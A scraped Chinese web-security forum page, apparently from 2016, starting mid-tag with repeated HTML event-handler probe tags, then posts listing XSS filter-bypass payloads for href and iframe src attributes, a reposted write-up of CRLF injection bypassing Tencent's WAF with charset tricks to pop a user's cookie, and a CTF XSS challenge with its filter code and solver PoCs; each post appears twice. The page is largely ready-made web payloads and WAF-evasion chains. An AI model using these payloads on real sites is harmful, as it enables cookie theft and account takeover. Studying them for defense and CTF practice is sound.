ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer> 
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a>https://randywestergren.com/persistent-xss-verizons-webmail-client/   在这里看到的 查看全部
<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure>

<footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer>
 
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a>
https://randywestergren.com/persistent-xss-verizons-webmail-client/   在这里看到的

a标签的href属性Xss的多种bypass场景

Web安全渗透Mosuan 发表了文章 • 8 个评论 • 1445 次浏览 • 2016-11-28 15:33 • 来自相关话题

iframe的src也一样。
 
有不同的姿势可以说出来,大家一起讨论啊。
 
0x01:过滤了冒号,可以用实体编码绕过!
javascript&colon;alert(10)
 
0x02:Javascript变种!
Javascript:alert(1)//大小写绕过。
java&Tab;script:confirm(11)//实体编码
javasc&NewLine;ript&colon;alert(1)//实体编码

0x03:不出现javascript or script!
data:text/html;base64,PHNjcmlwdD5hbGVydCgiMSIpPC9zY3JpcHQ+ //利用data伪协议

0x04:冒号后面不连接字符!
javascript:%0dalert(1)
 
0x05:href必须带着url!
javascript:alert(1)//http://www.0aa.me  //利用注释
javascript:%0dhttp://www.0aa.me%0dalert(1)  //不能用注释的情况下
 
0x06:不能注释!
javascript:alert(1)%0daaadafa
 
0x07:协议后面必须跟着网站!
javascript://www.0aa.me%0dalert(1)
 
0x08:过滤括号!
javascript:alert`1`
javascript:`${alert `0aa.me`}`
javascript:alert&lpar;1&rpar;

0x09:只过滤一次!
javasjavascript:cript:alert(1)

常用xss测试代码:
"'%&#></script><p class="onmouseover=" onmouseover="xx" onxxx="">xxx</p> 查看全部
iframe的src也一样。
 
有不同的姿势可以说出来,大家一起讨论啊。
 
0x01:过滤了冒号,可以用实体编码绕过!
javascript&colon;alert(10)
 
0x02:Javascript变种!
Javascript:alert(1)//大小写绕过。
java&Tab;script:confirm(11)//实体编码
javasc&NewLine;ript&colon;alert(1)//实体编码

0x03:不出现javascript or script!
data:text/html;base64,PHNjcmlwdD5hbGVydCgiMSIpPC9zY3JpcHQ+ //利用data伪协议

0x04:冒号后面不连接字符!
javascript:%0dalert(1)
 
0x05:href必须带着url!
javascript:alert(1)//http://www.0aa.me  //利用注释
javascript:%0dhttp://www.0aa.me%0dalert(1)  //不能用注释的情况下
 
0x06:不能注释!
javascript:alert(1)%0daaadafa
 
0x07:协议后面必须跟着网站!
javascript://www.0aa.me%0dalert(1)
 
0x08:过滤括号!
javascript:alert`1`
javascript:`${alert `0aa.me`}`
javascript:alert&lpar;1&rpar;

0x09:只过滤一次!
javasjavascript:cript:alert(1)

常用xss测试代码:
"'%&#></script><p class="onmouseover=" onmouseover="xx" onxxx="">xxx</p>

【转载】CRLF Injection and Bypass Tencent WAF

Web安全渗透Mosuan 发表了文章 • 3 个评论 • 512 次浏览 • 2016-11-25 16:14 • 来自相关话题

转自:http://zhchbin.github.io/2016/01/31/CRLF-Injection-and-Bypass-WAF/
 前言

这是一篇关于HTTP Response Split(CRLF Injection)漏洞的及绕过腾讯WAF导致前端出现XSS的实例分析,个人觉得在这个过程中能学到点知识,因此整理出来分享一下,如果不感兴趣记得及时关闭页面。
 
关于HRS问题
 我们都知道,HTTP协议是依靠两个CRLF,即\r\n来分割HTTP头部及响应体。基于这个认知,可以推出,HRS问题是由于服务端程序没有过滤掉头部中的特殊字符%0D%0A,直接输出到了返回的数据中,导致错误的解析。而在日常开发中,最常见的莫过于有以下的两种功能(1)URL跳转(2)Cookie的设置中出现。接下来的小节里,将会以一个Cookie实例作来说明这个问题的危害。实例在:http://wooyun.org/bugs/wooyun-2016-0173904 ,目前腾讯已经修复了。
 
接口说明
 这个接口在大家使用微信红包的过程中都用过,我用xxx.com代表接口的域名,具体接口的功能我就先不说,虽然危害不大。接口如下:
https://xxx.com/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a返回
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:08:28 GMT
Content-Type: text/html; charset=gbk
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a; Domain=xxx.com; Path=/; Expires=Sun, 31-Jan-2016 12:08:28 GMT
在微信端这个接口其实没有什么问题,因为微信客户端会把这个参数替换掉,因此攻击者填入的参数就会被直接去掉,然而在浏览器中,却导致了XSS。
 
一步一个脚印
 
0x00 插入img标签
 从上面接口的返回数据中,可以看到pass_ticket参数的值出现在了Set-Cookie头部中,我们先试试能不能用插入两个CRLF,然后插入img标签。
exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
然而这个请求返回了空,浏览器根本不去解析body里的内容。不能放弃,通过curl分析一下,发现其实后端并没有过滤,请求都返回了,只是Content-Length为0导致浏览器认为Body为空,使用命令curl -kv <url>可以看到以下的错误提示。
* Excess found in a non pipelined read: excess = 84 url =
/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
(zero-length body)知道问题之后,我们下一步就是想方法让Content-Length的值不为0!试着在头部插入Content-Length: 60,得到以下的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E
浏览器里访问,bingo,图片出现了!
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:15:03 GMT
Content-Type: text/html; charset=gbk
Content-Length: 60
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a

<img src=1>; Domain=wx.tenpay.com; Path=/; Expires=Sun, 31-J





 
0x01 尝试执行脚本
 能够插入img标签之后,我半生不熟的前端知识告诉我,src=1,图片肯定会加载失败,失败了就会有onerror的事件发生。于是,试试下面的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%20onerror=alert(1)%3E
事实告诉我们,现实并没有想象中的美好,服务器直接返回了501,这是什么原因导致的?尝试几次之后推断是被WAF拦截了。WAF是Web Application Firewall的缩写,我们的“恶意”请求被它检查出来。试了一下,发现在被和谐的的onerror和alert中间插入一些其他字符,就不会被拦截,例如:on\error=al\ert(1),然而这并没有什么卵用,因为这根本就不是合法的HTML属性。
 
0x02 Bypass WAF
 有WAF,就得考虑如何绕过,然而在确认了自己的认知范围里并没有绕过的方法后,我去请教了@mramydnei。以下是他提供的思路及Bypass WAF的例子:
大概原理就是:
[]插入Content-Type更改response中的charset[/][]选择一个字符集,保证该字符集中的某个字符或字符串会被浏览器忽略(也可以是unicode transform)[/][]将会被忽略的字符插入到被blacklist拦截的字符之间[/][]done[/]
exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E 
看到他的回复后,我只有一个想法:人要有敬畏之心!后来找了一下,在Chrome的Issue List找到了一些相关的讨论,https://crbug.com/114941
 
0x03 绕过浏览器的XSS过滤
 由于是反射型的XSS,Chrome里直接访问的时候会发现它拦截了脚本的执行,虽然在firefox里是可行的。从上面中的分析过程中,我们可以知道一个事情:可以在返回的头部的信息里插入任何头部信息!这看上去很赞,于是就想起了Chrome的XSS过滤是可以被关闭的,只要你返回的头部中带有X-XSS-Protection:0,构造URL如下:
 
?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AX-XSS-Protection:0%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=%22al%1B%28Jert%28document.co%1B%28Jokie%29%22%3E
点击后可以看到页面弹出了用户的Cookie,好了。虽然我们的xxx.com只是它的某个子域,这里的Cookie却弹出了其他子域名的,为什么呢?因为前端用了document.domain = xx.com




最后说几句
 在这个过程中,你学到了什么呢?反思这个过程,我觉得是信息量好大。对于我们做开发的,我认为最重要的一点是,用户的输入都是不可信的(这句话已经被无数人说过无数次了应该)。另外我读了一下Python Web框架里的一些代码,发现有些框架已经帮我们处理掉部分问题,例如在Flask中调用设置Cookie的相关接口中,werkzeug会使用白名单的机制检查每个byte,如果发现恶意字符,则将输入的值中用双引号包围起来,同时还有转义一部分字符,具体代码在这里:https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/_internal.py#L222 。
 
放几个参考链接:
[]https://en.wikipedia.org/wiki/HTTP_response_splitting[/][]http://blog.bentkowski.info/2014/07/google-doodle-xss-actually-response.html[/][]http://drops.wooyun.org/papers/2466[/]
 
Mosuan题外话 学习需要低调点,需要有颗敬畏知识的心,人外有人,山外有山。 查看全部
转自:http://zhchbin.github.io/2016/01/31/CRLF-Injection-and-Bypass-WAF/
 前言

这是一篇关于HTTP Response Split(CRLF Injection)漏洞的及绕过腾讯WAF导致前端出现XSS的实例分析,个人觉得在这个过程中能学到点知识,因此整理出来分享一下,如果不感兴趣记得及时关闭页面。
 
关于HRS问题
 我们都知道,HTTP协议是依靠两个CRLF,即\r\n来分割HTTP头部及响应体。基于这个认知,可以推出,HRS问题是由于服务端程序没有过滤掉头部中的特殊字符%0D%0A,直接输出到了返回的数据中,导致错误的解析。而在日常开发中,最常见的莫过于有以下的两种功能(1)URL跳转(2)Cookie的设置中出现。接下来的小节里,将会以一个Cookie实例作来说明这个问题的危害。实例在:http://wooyun.org/bugs/wooyun-2016-0173904 ,目前腾讯已经修复了。
 
接口说明
 这个接口在大家使用微信红包的过程中都用过,我用xxx.com代表接口的域名,具体接口的功能我就先不说,虽然危害不大。接口如下:
https://xxx.com/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a
返回
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:08:28 GMT
Content-Type: text/html; charset=gbk
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a; Domain=xxx.com; Path=/; Expires=Sun, 31-Jan-2016 12:08:28 GMT
在微信端这个接口其实没有什么问题,因为微信客户端会把这个参数替换掉,因此攻击者填入的参数就会被直接去掉,然而在浏览器中,却导致了XSS。
 
一步一个脚印
 
0x00 插入img标签
 从上面接口的返回数据中,可以看到pass_ticket参数的值出现在了Set-Cookie头部中,我们先试试能不能用插入两个CRLF,然后插入img标签。
exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
然而这个请求返回了空,浏览器根本不去解析body里的内容。不能放弃,通过curl分析一下,发现其实后端并没有过滤,请求都返回了,只是Content-Length为0导致浏览器认为Body为空,使用命令curl -kv <url>可以看到以下的错误提示。
* Excess found in a non pipelined read: excess = 84 url = 
/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
(zero-length body)
知道问题之后,我们下一步就是想方法让Content-Length的值不为0!试着在头部插入Content-Length: 60,得到以下的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E
浏览器里访问,bingo,图片出现了!
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:15:03 GMT
Content-Type: text/html; charset=gbk
Content-Length: 60
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a

<img src=1>; Domain=wx.tenpay.com; Path=/; Expires=Sun, 31-J

11111111111.png

 
0x01 尝试执行脚本
 能够插入img标签之后,我半生不熟的前端知识告诉我,src=1,图片肯定会加载失败,失败了就会有onerror的事件发生。于是,试试下面的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%20onerror=alert(1)%3E
事实告诉我们,现实并没有想象中的美好,服务器直接返回了501,这是什么原因导致的?尝试几次之后推断是被WAF拦截了。WAF是Web Application Firewall的缩写,我们的“恶意”请求被它检查出来。试了一下,发现在被和谐的的onerror和alert中间插入一些其他字符,就不会被拦截,例如:on\error=al\ert(1),然而这并没有什么卵用,因为这根本就不是合法的HTML属性。
 
0x02 Bypass WAF
 有WAF,就得考虑如何绕过,然而在确认了自己的认知范围里并没有绕过的方法后,我去请教了@mramydnei。以下是他提供的思路及Bypass WAF的例子:
大概原理就是:
    []插入Content-Type更改response中的charset[/][]选择一个字符集,保证该字符集中的某个字符或字符串会被浏览器忽略(也可以是unicode transform)[/][]将会被忽略的字符插入到被blacklist拦截的字符之间[/][]done[/]

exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E
 
看到他的回复后,我只有一个想法:人要有敬畏之心!后来找了一下,在Chrome的Issue List找到了一些相关的讨论,https://crbug.com/114941
 
0x03 绕过浏览器的XSS过滤
 由于是反射型的XSS,Chrome里直接访问的时候会发现它拦截了脚本的执行,虽然在firefox里是可行的。从上面中的分析过程中,我们可以知道一个事情:可以在返回的头部的信息里插入任何头部信息!这看上去很赞,于是就想起了Chrome的XSS过滤是可以被关闭的,只要你返回的头部中带有X-XSS-Protection:0,构造URL如下:
 
?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AX-XSS-Protection:0%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=%22al%1B%28Jert%28document.co%1B%28Jokie%29%22%3E
点击后可以看到页面弹出了用户的Cookie,好了。虽然我们的xxx.com只是它的某个子域,这里的Cookie却弹出了其他子域名的,为什么呢?因为前端用了document.domain = xx.com
2222222222.png

最后说几句
 在这个过程中,你学到了什么呢?反思这个过程,我觉得是信息量好大。对于我们做开发的,我认为最重要的一点是,用户的输入都是不可信的(这句话已经被无数人说过无数次了应该)。另外我读了一下Python Web框架里的一些代码,发现有些框架已经帮我们处理掉部分问题,例如在Flask中调用设置Cookie的相关接口中,werkzeug会使用白名单的机制检查每个byte,如果发现恶意字符,则将输入的值中用双引号包围起来,同时还有转义一部分字符,具体代码在这里:https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/_internal.py#L222 。
 
放几个参考链接:
    []https://en.wikipedia.org/wiki/HTTP_response_splitting[/][]http://blog.bentkowski.info/2014/07/google-doodle-xss-actually-response.html[/][]http://drops.wooyun.org/papers/2466[/]

 
Mosuan题外话 学习需要低调点,需要有颗敬畏知识的心,人外有人,山外有山。

【题目3答案】这是一道需要自动弹窗的Xss题

Web安全渗透Mosuan 发表了文章 • 6 个评论 • 527 次浏览 • 2016-11-21 08:35 • 来自相关话题

有好几个东西忘了写了,并且忘了说明详细的规则。
先从我出题的代码说起:
一开始正则如下:

/j|v|&|#|\(|\)|\"|;|formaction|oninput|onblur|cookie|document|window|data|\/\/|%|alert|confirm|:|,|http|<|>|' src=|\.\.|\/\*/
 
这个正则可以用onerror以及autofocus来绕过,我印象里面我记得我写了,不知道咋没写...日了狗了...群里的@春天的春,晴天的晴 利用onerror绕过了,我朋友利用autofocus绕过了,郑凯用onclick不过不能自动弹窗,也怪我没把规则说详细,然后我周末把这两个关键词添加到正则里面了。

$str = strtolower(strip_tags($_GET['idaaatest']));
preg_match($reg, $str, $result);

$num = count($result);
$strcount = strlen($str);
$str2 = substr_count($str,'=');
$str3 = substr_count($str,"'");

echo "你输入的字符为:$str<br><br>";

if($num >= 1 or $str2 > 2 or $str3 > 1 or $strcount > 50){​

上面正则匹配,然后判断字符串是否大于50 or 等号是否大于2个 or 单引号是否大于一个,如果是的话就进入黑名单里面。
 
代码说完了,说说解题思路
http://zone.secevery.com/?/article/329  从这里直接复制url访问会带上编码,导致404,这个小坑很多人都能迅速跳出来。





 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php  题目这里有张图片,cat下图片,可以看到图片尾部有个tips,那个tips就是参数。
随便输入个字符,然后查看源码发现是单引号,也就是说是利用单引号跳出属性,因为尖括号我做了处理,所以跳不出标签。
很多同学尝试alert、confirm发现被过滤了,可以用编码绕过或者prompt也可以弹窗。
圆括号被过滤了,可以利用反引号来代替圆括号。这个我在社区发过:http://zone.secevery.com/?/article/305
 
春天的春,晴天的晴的poc:image' src onerror=prompt`1` c
郑凯的poc:' onclick=\u0061\u006c\u0065\u0072\u0074`A` 1
 
我最大的失误还是忘了限制空格个数,之所以说我最大的失误是因为原本这道题我想让你们了解下url一些好玩东西以及js的。所以我在tips1哪里提示了一下属性的顺序,tips2提到了图片。
 
我的poc:image' onload=prompt`a` src=./2.png?
问号在url中可以说是参数之类的,不影响正常加载资源,所以说onload可以执行。
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php?idaaatest=image%27%20onload=prompt`a`%20src=./2.png?





 
 
 
  查看全部
有好几个东西忘了写了,并且忘了说明详细的规则。
先从我出题的代码说起:
一开始正则如下:

/j|v|&|#|\(|\)|\"|;|formaction|oninput|onblur|cookie|document|window|data|\/\/|%|alert|confirm|:|,|http|<|>|' src=|\.\.|\/\*/
 
这个正则可以用onerror以及autofocus来绕过,我印象里面我记得我写了,不知道咋没写...日了狗了...群里的@春天的春,晴天的晴 利用onerror绕过了,我朋友利用autofocus绕过了,郑凯用onclick不过不能自动弹窗,也怪我没把规则说详细,然后我周末把这两个关键词添加到正则里面了。

$str = strtolower(strip_tags($_GET['idaaatest']));
preg_match($reg, $str, $result);

$num = count($result);
$strcount = strlen($str);
$str2 = substr_count($str,'=');
$str3 = substr_count($str,"'");

echo "你输入的字符为:$str<br><br>";

if($num >= 1 or $str2 > 2 or $str3 > 1 or $strcount > 50){​


上面正则匹配,然后判断字符串是否大于50 or 等号是否大于2个 or 单引号是否大于一个,如果是的话就进入黑名单里面。
 
代码说完了,说说解题思路
http://zone.secevery.com/?/article/329  从这里直接复制url访问会带上编码,导致404,这个小坑很多人都能迅速跳出来。

404.png

 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php  题目这里有张图片,cat下图片,可以看到图片尾部有个tips,那个tips就是参数。
随便输入个字符,然后查看源码发现是单引号,也就是说是利用单引号跳出属性,因为尖括号我做了处理,所以跳不出标签。
很多同学尝试alert、confirm发现被过滤了,可以用编码绕过或者prompt也可以弹窗。
圆括号被过滤了,可以利用反引号来代替圆括号。这个我在社区发过:http://zone.secevery.com/?/article/305
 
春天的春,晴天的晴的poc:image' src onerror=prompt`1` c
郑凯的poc:' onclick=\u0061\u006c\u0065\u0072\u0074`A` 1
 
我最大的失误还是忘了限制空格个数,之所以说我最大的失误是因为原本这道题我想让你们了解下url一些好玩东西以及js的。所以我在tips1哪里提示了一下属性的顺序,tips2提到了图片。
 
我的poc:image' onload=prompt`a` src=./2.png?
问号在url中可以说是参数之类的,不影响正常加载资源,所以说onload可以执行。
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php?idaaatest=image%27%20onload=prompt`a`%20src=./2.png?

233222222222222.png

 
 
 
 

【题目3】给大家出了个很简单的题目,欢迎来搞

Web安全渗透Mosuan 发表了文章 • 5 个评论 • 675 次浏览 • 2016-11-18 16:14 • 来自相关话题

这还是Xss的题目,不要扫描!!!不要乱搞!!!!禁止讨论!!!自己做!!!
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php​

不断地绕过,不断地突破防御机制,考验的是一个安全研究者对于漏洞原理的理解,更是猥琐的思路。 借用p神一句话,过滤也不是很多。
 
我早就闭上了双眼,我的目的只在于黑暗之中。--宇智波佐助
 
目标:弹出secevery.com
 
tips1:注意属性的顺序 2016.11.18 17:44
tips2:图片  2016.11.18 17:55
 
还是那句话,别讨论,做出者私聊我,有疑问也私聊我,第一做出的如果是女的,我可以跟你谈谈人生谈谈理想,男的免谈。 查看全部
这还是Xss的题目,不要扫描!!!不要乱搞!!!!禁止讨论!!!自己做!!!
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php​

不断地绕过,不断地突破防御机制,考验的是一个安全研究者对于漏洞原理的理解,更是猥琐的思路。 借用p神一句话,过滤也不是很多。
 
我早就闭上了双眼,我的目的只在于黑暗之中。--宇智波佐助
 
目标:弹出secevery.com
 
tips1:注意属性的顺序 2016.11.18 17:44
tips2:图片  2016.11.18 17:55
 
还是那句话,别讨论,做出者私聊我,有疑问也私聊我,第一做出的如果是女的,我可以跟你谈谈人生谈谈理想,男的免谈。

2.png